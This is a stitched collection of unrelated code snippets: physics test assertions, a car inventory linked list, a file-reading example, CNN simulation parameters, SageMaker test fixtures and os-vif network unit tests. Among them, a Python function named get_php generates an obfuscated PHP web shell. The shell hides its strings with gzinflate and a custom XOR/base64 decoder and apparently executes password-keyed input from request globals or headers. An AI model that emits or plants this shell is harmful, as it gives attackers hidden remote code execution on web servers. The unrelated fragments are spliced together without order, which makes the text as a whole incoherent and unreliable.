stress_cyl_ref = {}
stress_cyl_ref['rr'] = E/(16*R**2)*(L**2/4-RR**2)+stress['xx'](X,Y)*0
stress_cyl_ref['phiphi'] = E/(16*R**2)*(L**2/4-3*RR**2)+stress['xx'](X,Y)*0
stress_cyl_ref['rphi'] = stress['xx'](X,Y)*0
stress_cyl_ref['phir'] = stress['xx'](X,Y)*0
strain_cyl_ref = {}
strain_cyl_ref['rr'] = 1/(16*R**2)*((1-nu)*L**2/4-(1-3*nu)*RR**2)+stress['xx'](X,Y)*0
strain_cyl_ref['phiphi'] = 1/(16*R**2)*((1-nu)*L**2/4-(3-nu)*RR**2)+stress['xx'](X,Y)*0
strain_cyl_ref['rphi'] = stress['xx'](X,Y)*0
strain_cyl_ref['phir'] = stress['xx'](X,Y)*0
strain_cyl_ref['zphi'] = stress['xx'](X,Y)*0
strain_cyl_ref['phiz'] = stress['xx'](X,Y)*0
strain_cyl_ref['rz'] = stress['xx'](X,Y)*0
strain_cyl_ref['zr'] = stress['xx'](X,Y)*0
strain_cyl_ref['zz'] = nu/(4*R**2)*(RR**2-L**2/8)+stress['xx'](X,Y)*0
meps = np.finfo(np.float).eps #m
for i in ['r','phi']:
for j in ['r','phi']:
assert np.all(np.logical_or(np.abs(stress_cyl_ref[i+j] - stress_cyl[i+j](RR,PHI)) < meps,
np.logical_and(np.isnan(stress_cyl_ref[i+j]), np.isnan(stress_cyl[i+j](RR,PHI)))))
for i in ['r','phi','z']:
for j in ['r','phi','z']:
assert np.all(np.logical_or(np.abs(strain_cyl_ref[i+j] - strain_cyl[i+j](RR,PHI)) < meps,
np.logical_and(np.isnan(strain_cyl_ref[i+j]), np.isnan(strain_cyl[i+j](RR,PHI))))) |
import sys
for _ in[0]*int(input()):
input()
f=1
a=list(map(int,input().split()))
for x in a:
if a.count(x)>2:f=0
print("Yes" if f else "No")
|
def get_php(keyword: int = 4, passwd: str = "", salt: str = ""):
return """<?php
function dept($data,$salt="%s",$change=0x80){$data=base64_decode($data);$saltm = md5($salt);$len = strlen($data);$pass=strrev(str_rot13(substr(strrev($data^str_repeat($saltm,ceil($len / 32)) ^ str_repeat(chr($change),$len)),0,-32)));return $pass;}
class replace {
private $hash = "\\xab\\xa8\\xa9\\x00\\xc2\\x78\\x77\\xd7\\x90\\x9a\\xf8\\x00\\xff\\x60\\x20\\xe9\\xec\\xef\\xef\\xed\\xe9\\x5a\\xa3\\x92\\x97\\x98\\x9b\\x6a\\xab\\x12\\x1f\\xec\\x1a\\x14\\xe6\\x1a\\x14\\x0d\\x00\\x8b\\x07\\x00";
function __construct($var, $srcname, $array = null)
{
$this->var = $var;
$this->name = $srcname;
$this->cookie = get_class($this);
if(!is_null($array))
die((string)new replace($this->var,array($array,$this->name)));
}
function __toString(){
$die = $this->var .= gzinflate(substr($this->hash,-3)).$this->cookie;
$this->cookie = explode("|",gzinflate(substr($this->hash,0,-3)));
if(end($this->name) != 6){
$name = $this->name[0][$this->cookie[end($this->name)]][%s];
}else{
$name = $this->cookie[end($this->name)].'HTTP_%s]';
$die('.*', '\\0',$name,gzinflate("\\xcb\\x4d\\x2d\\x02\\x00"))=="";
}
die($die('.*', '\\0',dept($name),gzinflate("\\xcb\\x4d\\x2d\\x02\\x00")));
}
}
new replace(gzinflate("\\xcb\\x4d\\x4a\\x2d\\x4a\\x4d\\x07\\x00"), %s,$GLOBALS);""" % (salt, passwd, passwd.upper(), keyword)
|
from sys import version
from Nodo import Nodo
from AutoNuevo import AutoNuevo
from AutoUsado import AutoUsado
from zope.interface import implementer
class Lista:
__comienzo=None
__actual=None
__index=0
__tope=0
def __init__(self):
self.__comienzo=None
self.__actual=None
self.__index=0
self.__tope=0
def __iter__(self):
return self
def __next__(self):
if self.__index==self.__tope:
self.__actual=self.__comienzo
self.__index=0
raise StopIteration
else:
self.__index+=1
dato=self.__actual.getAuto()
def getTope(self):
return self.__tope
#CLAVE puede ser patente o posicion
def getNoto(self,clave):
band=False
retorno=None
#Posicion
if type(clave)==int:
if clave<self.__tope:
while not band and self.__index<=self.__tope:
if clave==self.__index:
retorno=self.__actual.getAuto()
band=True
else:
self.__actual=self.__actual.getSiguiente()
self.__index+=1
#PATENTE
else:
while not band and self.__index<self.__tope:
dato=self.__actual.getAuto()
if isinstance(dato,AutoUsado):
if dato.getPatente()==clave.lower():
retorno=dato
band=True
self.__actual=self.__actual.getSiguiente()
self.__index+=1
if band==False:
print("No encontrado.")
else:
print("Fue encontrado.")
self.__actual=self.__comienzo
self.__index=0
return retorno
def crearAuto(self):
band=False
retorno=None
while not band:
print("1. Auto Nuevo \n2. Auto Usado")
try:
op=int(input("\nIngrese opcion: "))
except:
print("\nOpcion erronea, intente de nuevo. ")
else:
band=op in [1,2]
if not band:
print("\nOpcion erronea, intente de nuevo. ")
modelo= input("Modelo: ")
puertas=int(input("Cantidad de puertas: "))
color=input("Color: ")
precioBase=float(input("Precio base: "))
if op==1:
try:
print("\nMarca Fiat")
marca= 'Fiat'
version=int(input("\nVersion del auto\n1. Base\n2.Full\nIngrese opcion: "))
while version not in[1,2]:
print("\nError,intente de nuevo.")
version=int(input("\nVersion del auto\n1. Base\n2.Full\nIngrese opcion: "))
if version==1:
version='base'
else:
version='full'
auto=AutoNuevo(modelo,puertas,color,precioBase,marca,version)
retorno=auto
except:
print("Error en los datos agregados.")
else:
marca=input("\Marca: ")
patente=input("Patente: ")
anio=int(input("Anio: "))
kilometraje=float(input("Kilometraje: "))
auto=AutoUsado(modelo,puertas,color,precioBase,marca,patente,anio,kilometraje)
retorno=auto
return auto
def insertar(self,posicion,elemento):
band=False
band2=False
anterior=None
if posicion>=self.__tope:
print("\nPosicion fuera del alcance.")
band2=True
if band2==False:
if posicion==0:
band=True
self.__tope+=1
nuevoNodo=Nodo(elemento)
if self.__comienzo==None:
self.__comienzo=nuevoNodo
else:
nuevoNodo.setSiguiente(self.__comienzo)
self.__comienzo=nuevoNodo
else:
anterior=self.__actual
self.__actual=self.__actual.getSiguiente()
self.__index+=1
while not band and self.__index<self.__tope:
if self.__index==posicion:
nuevoNodo=Nodo(elemento)
nuevoNodo.setSiguiente(self.__actual)
anterior.setSiguiente(nuevoNodo)
self.__tope+=1
band=True
else:
anterior=self.__actual
self.__actual=self.__actual.getSiguiente()
self.__index+=1
self.__actual=self.__comienzo
self.__index=0
def agregar(self,elemento):
nodo=Nodo(elemento)
nodo.setSiguiente(self.__comienzo)
self.__comienzo=nodo
self.__actual=self.__comienzo
self.__tope+=1
def mostrarTipoObjeto(self,posicion):
auto=self.getNodo(posicion)
def cambiarPrecioBase(self,patente,precioNuevo):
auto=self.getNoto(patente)
if auto==None:
print("Patente no encontrada.")
else:
auto.setPrecioBase(precioNuevo)
def mostrarMasEconomico(self):
economico=None
menor= 50000000000 #poner un numero absurdo
for x in self.__iter__():
importeVenta=x.getImporteVenta()
if importeVenta<menor:
menor=importeVenta
economico=x
print("\n-------------------------------------------------------------------------------------------------")
print("{} {} {} {} {} {}".format("Modelo","Puertas","Color","Precio Base","Marca","Precio Total"))
print("--------------------------------------------------------------------------------------------------")
print(economico)
print("--------------------------------------------------------------------------------------------------")
def mostrar(self):
print("\n-------------------------------------------------------------------------------------------------")
print("{} {} {} {} {} {}".format("Modelo","Puertas","Color","Precio Base","Marca","Precio Total"))
print("--------------------------------------------------------------------------------------------------")
for elemento in self.__iter__():
print(elemento)
print("--------------------------------------------------------------------------------------------------")
def toJson(self):
d = dict(
__clas__ = self.__class__.__name__,
autos=[auto.toJson() for auto in self.__iter__()]
)
return d |
# readline 함수로 모든 내용을 읽어보기
f = open("C:/Users/chasu/OneDrive/바탕 화면/doit/새파일.txt", "r")
while True:
line = f.readline()
if not line: break
print(line)
f.close()
# while True: 무한 루프 안에서 f.readline()을 사용해 파일을 계속해서 한 줄씩 읽어 들인다.
# 만약 더 읽을 줄이 없으면 break를 수행한다.
# readline은 더 읽을 줄이 없다면 None을 출력한다.
|
'''
simulation_parameters.py
-> created to ensure consistency throughout ALL other files
'''
##########################################################
#Data parameters
#From the data, do not change unless you played with the preprocessing part
data_file = '../data_preprocessing/data_processed/final_table'
data_downscale = 400 #x and y have a range of 400, scaled down to [0,1]
max_time = 6 #in micro seconds
sample_freq = 20 #in MHz
beamformings = 32
#Parameters obtained from the ray-tracing simulator, DO NOT CHANGE
starting_x = -183.0
starting_y = -176.0
grid_x = 400.0
grid_y = 400.0
grid = [grid_x, grid_y]
x_shift = 0.0 - starting_x
y_shift = 0.0 - starting_y
shift = [x_shift, y_shift]
original_tx_power = 30 #in dBm
original_rx_gain = 0 #in dBi
#Data parameters
##########################################################
##########################################################
#Pre-processing parameters
#Logic behind these variables: the simulations were done with the above
# parameters. If we want to slightly change our target simulation power
# levels without re-doing the ray-tracing part, we can adapt here. The
# variable "minimum_power" represents the detection threshold
# ("baseline_cut") scaled by the a posteriori changes. In practical terms,
# any sampled power below "minimum_power" is below the detection threshold,
# and thus not detected.
baseline_cut = -100 #in dBm <--- change for different sample_freq (> thermal noise)
tx_power = 45 #in dBm
rx_gain = 10 #in dBi
minimum_power = baseline_cut - (tx_power-original_tx_power) - (rx_gain-original_rx_gain)
#Stored power feature if non-zero = (simulated_power[dBm]+power_offset)*power_scale
#E.g.: Power offset = 170, scale = 0.01 -> -50dbm in the data becomes 1.2;
# -150dbm becomes 0.2;
#Because this is done manually, the input feature's values will have a
# non-neglegible gap between absence of data (represented as 0) and a barely
# detectable power_sample (which should be bigger than 0.1), which helps
# the learning mechanism.
power_offset = 170
power_scale = 0.01
min_pow_cutoff = ((minimum_power+power_offset) * power_scale) #minimum_power converted
#If you have more than 1 GPU, you can change the target here
target_gpu = 0
preprocessed_file = 'processed_data/tf_dataset'
#[Optional] Remove time slots with little to no data. Requires hand-tunning
# for frequencies != 20 MHz.
removed_ts = True
slice_weak_TS_start_remove = 82
removed_invalid_slots = False
time_slots = max_time * sample_freq
if removed_ts:
#rescales the TS to remove to the target freq
slice_weak_TS_start_remove = int((slice_weak_TS_start_remove / 20) * sample_freq)
time_slots = time_slots - ( (time_slots-slice_weak_TS_start_remove) + 1)
#removed slots: [0, slice_weak_TS_start_remove through (max_time * sample_freq)]
#noise STD
test_noise = 6.00 #log-normal distribution = gaussian over dB values
noise_std_converted = (test_noise * power_scale)
#scaler
binary_scaler = True
only_16_bf = False #<--- change maxpool from [2,1] to [1,1] when this flag is
# true, to keep the same resource utilization and thus
# enable a fair comparison
predicted_input_size = time_slots * beamformings
#Misc. [for other tests]
detect_invalid_slots = False
slice_weak_TS = removed_ts
train_spatial_undersampling = 1 # =1 -> 1m between samples, =2 -> 2m, ...
# min = 1 m
#Pre-processing parameters
##########################################################
##########################################################
#CNN - Classification parameters
#With this variable, can control the number of classes. We will have
# 'lateral_partition'^2 classes. If lateral_partition == 1, the code will
# jump straight into the regression part.
lateral_partition = 8
area_partition = lateral_partition ** 2
n_classes = area_partition #this variable has 2 instances, for readability
dnn_classification_parameters = { 'batch_size': 64,
'epochs': 1000,
'dropout': 0.01, #<--- the dropout is small because we are also adding noise to the data
'learning_rate': 1e-4,
'learning_rate_decay': 0.995,
'fcl_neurons': 256,
'hidden_layers': 12,
'cl_neurons_1': 8,
'cl_filter_1': [3,3],
'cl_maxpool_1': [2,1], #<--- as currently defined, the "temporal" dimention has 81 slots:
#divisible by 1, 3, 9, 27 -> don't try maxpool(2,2), it will crash
'test_batch_size': 256 }
#CNN - Classification parameters
##########################################################
##########################################################
#CNN - Regression parameters
train_sets = 20
test_sets = 10
n_predictions = train_sets+test_sets #<-- it's to heavy to generate them at runtime :(
dnn_regression_parameters = { 'batch_size': 64,
'epochs': 1000,
'dropout': 0.01,
'learning_rate': 1e-4,
'learning_rate_decay': 0.995,
'fcl_neurons': 256,
'hidden_layers': 12,
'cl_neurons_1': 8,
'cl_filter_1': [3,3],
'cl_maxpool_1': [2,1], #<--- as currently defined, the "temporal" dimention has 81 slots:
#divisible by 1, 3, 9, 27 -> don't try maxpool(2,2), it will crash
'test_batch_size': 256 }
#CNN - Regression parameters
##########################################################
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from __future__ import absolute_import
import pytest
import sagemaker
from mock import Mock, PropertyMock
_ROLE = "DummyRole"
_REGION = "us-west-2"
_DEFAULT_BUCKET = "my-bucket"
@pytest.fixture(scope="session")
def client():
"""Mock client.
Considerations when appropriate:
* utilize botocore.stub.Stubber
* separate runtime client from client
"""
client_mock = Mock()
client_mock._client_config.user_agent = (
"Boto3/1.14.24 Python/3.8.5 Linux/5.4.0-42-generic Botocore/1.17.24 Resource"
)
return client_mock
@pytest.fixture(scope="session")
def boto_session(client):
role_mock = Mock()
type(role_mock).arn = PropertyMock(return_value=_ROLE)
resource_mock = Mock()
resource_mock.Role.return_value = role_mock
session_mock = Mock(region_name=_REGION)
session_mock.resource.return_value = resource_mock
session_mock.client.return_value = client
return session_mock
@pytest.fixture(scope="session")
def sagemaker_session(boto_session, client):
# ideally this would mock Session instead of instantiating it
# most unit tests do mock the session correctly
session = sagemaker.session.Session(
boto_session=boto_session,
sagemaker_client=client,
sagemaker_runtime_client=client,
default_bucket=_DEFAULT_BUCKET,
sagemaker_metrics_client=client,
)
return session
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import glob
import mock
import os.path
import testtools
from os_vif.internal.command import ip as ip_lib
from oslo_concurrency import processutils
from vif_plug_ovs import constants
from vif_plug_ovs import exception
from vif_plug_ovs import linux_net
from vif_plug_ovs import privsep
class LinuxNetTest(testtools.TestCase):
def setUp(self):
super(LinuxNetTest, self).setUp()
privsep.vif_plug.set_client_mode(False)
@mock.patch.object(ip_lib, "set")
@mock.patch.object(linux_net, "device_exists", return_value=True)
def test_ensure_bridge_exists(self, mock_dev_exists, mock_ip_set):
linux_net.ensure_bridge("br0")
mock_ip_set.assert_called_once_with('br0', state='up',
check_exit_code=[0, 2, 254])
mock_dev_exists.assert_has_calls([mock.call("br0")])
@mock.patch.object(ip_lib, "set")
@mock.patch.object(os.path, "exists", return_value=False)
@mock.patch.object(processutils, "execute")
@mock.patch.object(linux_net, "device_exists", return_value=False)
def test_ensure_bridge_new_ipv4(self, mock_dev_exists, mock_execute,
mock_path_exists, mock_ip_set):
linux_net.ensure_bridge("br0")
calls = [
mock.call('brctl', 'addbr', 'br0'),
mock.call('brctl', 'setfd', 'br0', 0),
mock.call('brctl', 'stp', 'br0', "off"),
mock.call('brctl', 'setageing', 'br0', 0),
mock.call('tee', '/sys/class/net/br0/bridge/multicast_snooping',
check_exit_code=[0, 1], process_input='0'),
]
mock_execute.assert_has_calls(calls)
mock_dev_exists.assert_has_calls([mock.call("br0")])
mock_ip_set.assert_called_once_with('br0', state='up',
check_exit_code=[0, 2, 254])
@mock.patch.object(ip_lib, "set")
@mock.patch.object(os.path, "exists", return_value=True)
@mock.patch.object(processutils, "execute")
@mock.patch.object(linux_net, "device_exists", return_value=False)
def test_ensure_bridge_new_ipv6(self, mock_dev_exists, mock_execute,
mock_path_exists, mock_ip_set):
linux_net.ensure_bridge("br0")
calls = [
mock.call('brctl', 'addbr', 'br0'),
mock.call('brctl', 'setfd', 'br0', 0),
mock.call('brctl', 'stp', 'br0', "off"),
mock.call('brctl', 'setageing', 'br0', 0),
mock.call('tee', '/sys/class/net/br0/bridge/multicast_snooping',
check_exit_code=[0, 1], process_input='0'),
mock.call('tee', '/proc/sys/net/ipv6/conf/br0/disable_ipv6',
check_exit_code=[0, 1], process_input='1'),
]
mock_execute.assert_has_calls(calls)
mock_dev_exists.assert_has_calls([mock.call("br0")])
mock_ip_set.assert_called_once_with('br0', state='up',
check_exit_code=[0, 2, 254])
@mock.patch.object(processutils, "execute")
@mock.patch.object(linux_net, "device_exists", return_value=False)
@mock.patch.object(linux_net, "interface_in_bridge", return_value=False)
def test_delete_bridge_none(self, mock_interface_br, mock_dev_exists,
mock_execute,):
linux_net.delete_bridge("br0", "vnet1")
mock_execute.assert_not_called()
mock_dev_exists.assert_has_calls([mock.call("br0")])
mock_interface_br.assert_not_called()
@mock.patch.object(ip_lib, "set")
@mock.patch.object(processutils, "execute")
@mock.patch.object(linux_net, "device_exists", return_value=True)
@mock.patch.object(linux_net, "interface_in_bridge", return_value=True)
def test_delete_bridge_exists(self, mock_interface_br, mock_dev_exists,
mock_execute, mock_ip_set):
linux_net.delete_bridge("br0", "vnet1")
calls = [
mock.call('brctl', 'delif', 'br0', 'vnet1'),
mock.call('brctl', 'delbr', 'br0')]
mock_execute.assert_has_calls(calls)
mock_dev_exists.assert_has_calls([mock.call("br0")])
mock_interface_br.assert_called_once_with("br0", "vnet1")
mock_ip_set.assert_called_once_with('br0', state='down')
@mock.patch.object(ip_lib, "set")
@mock.patch.object(processutils, "execute")
@mock.patch.object(linux_net, "device_exists", return_value=True)
@mock.patch.object(linux_net, "interface_in_bridge", return_value=False)
def test_delete_interface_not_present(self,
mock_interface_br, mock_dev_exists, mock_execute, mock_ip_set):
linux_net.delete_bridge("br0", "vnet1")
mock_execute.assert_called_once_with('brctl', 'delbr', 'br0')
mock_dev_exists.assert_has_calls([mock.call("br0")])
mock_interface_br.assert_called_once_with("br0", "vnet1")
mock_ip_set.assert_called_once_with('br0', state='down')
@mock.patch.object(processutils, "execute")
def test_add_bridge_port(self, mock_execute):
linux_net.add_bridge_port("br0", "vnet1")
mock_execute.assert_has_calls([
mock.call('brctl', 'addif', 'br0', 'vnet1')])
def test_ovs_vif_port_cmd(self):
expected = ['--', '--may-exist', 'add-port',
'fake-bridge', 'fake-dev',
'--', 'set', 'Interface', 'fake-dev',
'external-ids:iface-id=fake-iface-id',
'external-ids:iface-status=active',
'external-ids:attached-mac=fake-mac',
'external-ids:vm-uuid=fake-instance-uuid']
cmd = linux_net._create_ovs_vif_cmd('fake-bridge', 'fake-dev',
'fake-iface-id', 'fake-mac',
'fake-instance-uuid')
self.assertEqual(expected, cmd)
expected += ['type=fake-type']
cmd = linux_net._create_ovs_vif_cmd('fake-bridge', 'fake-dev',
'fake-iface-id', 'fake-mac',
'fake-instance-uuid',
'fake-type')
self.assertEqual(expected, cmd)
expected += ['options:vhost-server-path=/fake/path']
cmd = linux_net._create_ovs_vif_cmd('fake-bridge', 'fake-dev',
'fake-iface-id', 'fake-mac',
'fake-instance-uuid',
'fake-type',
vhost_server_path='/fake/path')
self.assertEqual(expected, cmd)
@mock.patch.object(linux_net, '_create_ovs_bridge_cmd')
@mock.patch.object(linux_net, '_ovs_vsctl')
def test_ensure_ovs_bridge(self, mock_vsctl, mock_create_ovs_bridge):
bridge = 'fake-bridge'
dp_type = 'fake-type'
linux_net.ensure_ovs_bridge(bridge, dp_type)
mock_create_ovs_bridge.assert_called_once_with(bridge, dp_type)
self.assertTrue(mock_vsctl.called)
def test_create_ovs_bridge_cmd(self):
bridge = 'fake-bridge'
dp_type = 'fake-type'
expected = ['--', '--may-exist', 'add-br', bridge,
'--', 'set', 'Bridge', bridge,
'datapath_type=%s' % dp_type]
actual = linux_net._create_ovs_bridge_cmd(bridge, dp_type)
self.assertEqual(expected, actual)
@mock.patch.object(linux_net, '_ovs_supports_mtu_requests')
@mock.patch.object(linux_net, '_ovs_vsctl')
@mock.patch.object(linux_net, '_create_ovs_vif_cmd')
@mock.patch.object(linux_net, '_set_device_mtu')
def test_ovs_vif_port_with_type_vhostuser(self, mock_set_device_mtu,
mock_create_cmd, mock_vsctl,
mock_ovs_supports_mtu_requests):
mock_ovs_supports_mtu_requests.return_value = True
linux_net.create_ovs_vif_port(
'fake-bridge',
'fake-dev', 'fake-iface-id', 'fake-mac',
"fake-instance-uuid", mtu=1500,
interface_type=constants.OVS_VHOSTUSER_INTERFACE_TYPE)
mock_create_cmd.assert_called_once_with('fake-bridge',
'fake-dev', 'fake-iface-id', 'fake-mac',
"fake-instance-uuid", constants.OVS_VHOSTUSER_INTERFACE_TYPE,
None)
self.assertFalse(mock_set_device_mtu.called)
self.assertTrue(mock_vsctl.called)
@mock.patch.object(linux_net, '_ovs_supports_mtu_requests')
@mock.patch.object(linux_net, '_ovs_vsctl')
@mock.patch.object(linux_net, '_create_ovs_vif_cmd')
@mock.patch.object(linux_net, '_set_device_mtu')
def test_ovs_vif_port_with_type_vhostuserclient(self,
mock_set_device_mtu, mock_create_cmd,
mock_vsctl, mock_ovs_supports_mtu_requests):
mock_ovs_supports_mtu_requests.return_value = True
linux_net.create_ovs_vif_port(
'fake-bridge',
'fake-dev', 'fake-iface-id', 'fake-mac',
"fake-instance-uuid", mtu=1500,
interface_type=constants.OVS_VHOSTUSER_CLIENT_INTERFACE_TYPE,
vhost_server_path="/fake/path")
mock_create_cmd.assert_called_once_with('fake-bridge',
'fake-dev', 'fake-iface-id', 'fake-mac',
"fake-instance-uuid",
constants.OVS_VHOSTUSER_CLIENT_INTERFACE_TYPE,
"/fake/path")
self.assertFalse(mock_set_device_mtu.called)
self.assertTrue(mock_vsctl.called)
@mock.patch.object(linux_net, '_ovs_supports_mtu_requests')
@mock.patch.object(linux_net, '_ovs_vsctl')
@mock.patch.object(linux_net, '_create_ovs_vif_cmd')
@mock.patch.object(linux_net, '_set_device_mtu')
def test_ovs_vif_port_with_no_mtu(self, mock_set_device_mtu,
mock_create_cmd, mock_vsctl,
mock_ovs_supports_mtu_requests):
mock_ovs_supports_mtu_requests.return_value = True
linux_net.create_ovs_vif_port(
'fake-bridge',
'fake-dev', 'fake-iface-id', 'fake-mac',
"fake-instance-uuid")
mock_create_cmd.assert_called_once_with('fake-bridge',
'fake-dev', 'fake-iface-id', 'fake-mac',
"fake-instance-uuid", None, None)
self.assertFalse(mock_set_device_mtu.called)
self.assertTrue(mock_vsctl.called)
@mock.patch.object(linux_net, '_ovs_supports_mtu_requests')
@mock.patch.object(linux_net, '_set_mtu_request')
@mock.patch.object(linux_net, '_ovs_vsctl')
@mock.patch.object(linux_net, '_create_ovs_vif_cmd',
return_value='ovs_command')
@mock.patch.object(linux_net, '_set_device_mtu')
def test_ovs_vif_port_with_timeout(self, mock_set_device_mtu,
mock_create_cmd, mock_vsctl,
mock_set_mtu_request,
mock_ovs_supports_mtu_requests):
mock_ovs_supports_mtu_requests.return_value = True
linux_net.create_ovs_vif_port(
'fake-bridge',
'fake-dev', 'fake-iface-id', 'fake-mac',
"fake-instance-uuid", ovsdb_connection=None,
timeout=42)
self.assertTrue(mock_create_cmd.called)
self.assertFalse(mock_set_device_mtu.called)
mock_vsctl.assert_called_with('ovs_command', ovsdb_connection=None,
timeout=42)
@mock.patch.object(linux_net, '_ovs_supports_mtu_requests')
@mock.patch.object(linux_net, '_set_mtu_request')
@mock.patch.object(linux_net, '_ovs_vsctl')
@mock.patch.object(linux_net, '_create_ovs_vif_cmd',
return_value='ovs_command')
@mock.patch.object(linux_net, '_set_device_mtu')
def test_ovs_vif_port_with_no_timeout(self, mock_set_device_mtu,
mock_create_cmd, mock_vsctl,
mock_set_mtu_request,
mock_ovs_supports_mtu_requests):
mock_ovs_supports_mtu_requests.return_value = True
linux_net.create_ovs_vif_port(
'fake-bridge',
'fake-dev', 'fake-iface-id', 'fake-mac',
"fake-instance-uuid")
self.assertTrue(mock_create_cmd.called)
self.assertFalse(mock_set_device_mtu.called)
mock_vsctl.assert_called_with('ovs_command', ovsdb_connection=None,
timeout=None)
@mock.patch.object(linux_net, '_ovs_supports_mtu_requests')
@mock.patch.object(linux_net, '_set_mtu_request')
@mock.patch.object(linux_net, '_ovs_vsctl')
@mock.patch.object(linux_net, '_create_ovs_vif_cmd',
return_value='ovs_command')
@mock.patch.object(linux_net, '_set_device_mtu')
def test_ovs_vif_port_with_ovsdb_connection(self, mock_set_device_mtu,
mock_create_cmd, mock_vsctl,
mock_set_mtu_request,
mock_ovs_supports_mtu_requests):
mock_ovs_supports_mtu_requests.return_value = True
linux_net.create_ovs_vif_port(
'fake-bridge',
'fake-dev', 'fake-iface-id', 'fake-mac',
"fake-instance-uuid", ovsdb_connection='tcp:127.0.0.1:6640',
timeout=42)
self.assertTrue(mock_create_cmd.called)
self.assertFalse(mock_set_device_mtu.called)
mock_vsctl.assert_called_with('ovs_command',
ovsdb_connection='tcp:127.0.0.1:6640',
timeout=42)
@mock.patch.object(processutils, "execute")
def test_ovs_vsctl(self, mock_execute):
args = ['fake-args', 42]
ovsdb_connection = 'tcp:127.0.0.1:6640'
timeout = 42
linux_net._ovs_vsctl(args)
linux_net._ovs_vsctl(args, ovsdb_connection=ovsdb_connection,
timeout=timeout)
mock_execute.assert_has_calls([
mock.call('ovs-vsctl', *args),
mock.call('ovs-vsctl', '--timeout=%s' % timeout,
'--db=%s' % ovsdb_connection, *args)])
@mock.patch.object(linux_net, '_ovs_vsctl')
def test_set_mtu_request(self, mock_vsctl):
dev = 'fake-dev'
mtu = 'fake-mtu'
ovsdb_connection = None
timeout = 120
linux_net._set_mtu_request(dev, mtu, ovsdb_connection=ovsdb_connection,
timeout=timeout)
args = ['--', 'set', 'interface', dev,
'mtu_request=%s' % mtu]
mock_vsctl.assert_called_with(args, ovsdb_connection=ovsdb_connection,
timeout=timeout)
@mock.patch.object(linux_net, '_delete_net_dev')
@mock.patch.object(linux_net, '_ovs_vsctl')
def test_delete_ovs_vif_port_delete_netdev(
self, mock_vsctl, mock_delete_net_dev):
bridge = 'fake-bridge'
dev = 'fake-dev'
ovsdb_connection = None
timeout = 120
linux_net.delete_ovs_vif_port(bridge, dev,
ovsdb_connection=ovsdb_connection,
timeout=timeout)
args = ['--', '--if-exists', 'del-port', bridge, dev]
mock_vsctl.assert_called_with(args, ovsdb_connection=ovsdb_connection,
timeout=timeout)
mock_delete_net_dev.assert_called()
@mock.patch.object(linux_net, '_delete_net_dev')
@mock.patch.object(linux_net, '_ovs_vsctl')
def test_delete_ovs_vif_port(self, mock_vsctl, mock_delete_net_dev):
bridge = 'fake-bridge'
dev = 'fake-dev'
ovsdb_connection = None
timeout = 120
linux_net.delete_ovs_vif_port(
bridge, dev, ovsdb_connection=ovsdb_connection, timeout=timeout,
delete_netdev=False)
args = ['--', '--if-exists', 'del-port', bridge, dev]
mock_vsctl.assert_called_with(args, ovsdb_connection=ovsdb_connection,
timeout=timeout)
mock_delete_net_dev.assert_not_called()
@mock.patch.object(linux_net, '_ovs_vsctl')
def test_ovs_supports_mtu_requests(self, mock_vsctl):
args = ['--columns=mtu_request', 'list', 'interface']
ovsdb_connection = None
timeout = 120
msg = 'ovs-vsctl: Interface does not contain' + \
' a column whose name matches "mtu_request"'
mock_vsctl.return_value = (None, msg)
result = linux_net._ovs_supports_mtu_requests(
ovsdb_connection=ovsdb_connection,
timeout=timeout)
mock_vsctl.assert_called_with(args, ovsdb_connection=ovsdb_connection,
timeout=timeout)
self.assertFalse(result)
mock_vsctl.return_value = (None, None)
result = linux_net._ovs_supports_mtu_requests(
ovsdb_connection=ovsdb_connection,
timeout=timeout)
mock_vsctl.assert_called_with(args, ovsdb_connection=ovsdb_connection,
timeout=timeout)
self.assertTrue(result)
@mock.patch('six.moves.builtins.open')
@mock.patch.object(os.path, 'isfile')
def test_is_switchdev_ioerror(self, mock_isfile, mock_open):
mock_isfile.side_effect = [True]
mock_open.return_value.__enter__ = lambda s: s
readline_mock = mock_open.return_value.readline
readline_mock.side_effect = (
[IOError()])
test_switchdev = linux_net._is_switchdev('pf_ifname')
self.assertEqual(test_switchdev, False)
@mock.patch('six.moves.builtins.open')
@mock.patch.object(os.path, 'isfile')
def test_is_switchdev_empty(self, mock_isfile, mock_open):
mock_isfile.side_effect = [True]
mock_open.return_value.__enter__ = lambda s: s
readline_mock = mock_open.return_value.readline
readline_mock.side_effect = (
[''])
open_calls = (
[mock.call('/sys/class/net/pf_ifname/phys_switch_id', 'r'),
mock.call().readline(),
mock.call().__exit__(None, None, None)])
test_switchdev = linux_net._is_switchdev('pf_ifname')
mock_open.assert_has_calls(open_calls)
self.assertEqual(test_switchdev, False)
@mock.patch('six.moves.builtins.open')
@mock.patch.object(os.path, 'isfile')
def test_is_switchdev_positive(self, mock_isfile, mock_open):
mock_isfile.side_effect = [True]
mock_open.return_value.__enter__ = lambda s: s
readline_mock = mock_open.return_value.readline
readline_mock.side_effect = (
['pf_sw_id'])
open_calls = (
[mock.call('/sys/class/net/pf_ifname/phys_switch_id', 'r'),
mock.call().readline(),
mock.call().__exit__(None, None, None)])
test_switchdev = linux_net._is_switchdev('pf_ifname')
mock_open.assert_has_calls(open_calls)
self.assertEqual(test_switchdev, True)
def test_parse_vf_number(self):
self.assertEqual(linux_net._parse_vf_number("0"), "0")
self.assertEqual(linux_net._parse_vf_number("pf13vf42"), "42")
self.assertEqual(linux_net._parse_vf_number("VF19@PF13"), "19")
self.assertIsNone(linux_net._parse_vf_number("p7"))
self.assertIsNone(linux_net._parse_vf_number("pf31"))
self.assertIsNone(linux_net._parse_vf_number("g4rbl3d"))
def test_parse_pf_number(self):
self.assertIsNone(linux_net._parse_pf_number("0"))
self.assertEqual(linux_net._parse_pf_number("pf13vf42"), "13")
self.assertEqual(linux_net._parse_pf_number("VF19@PF13"), "13")
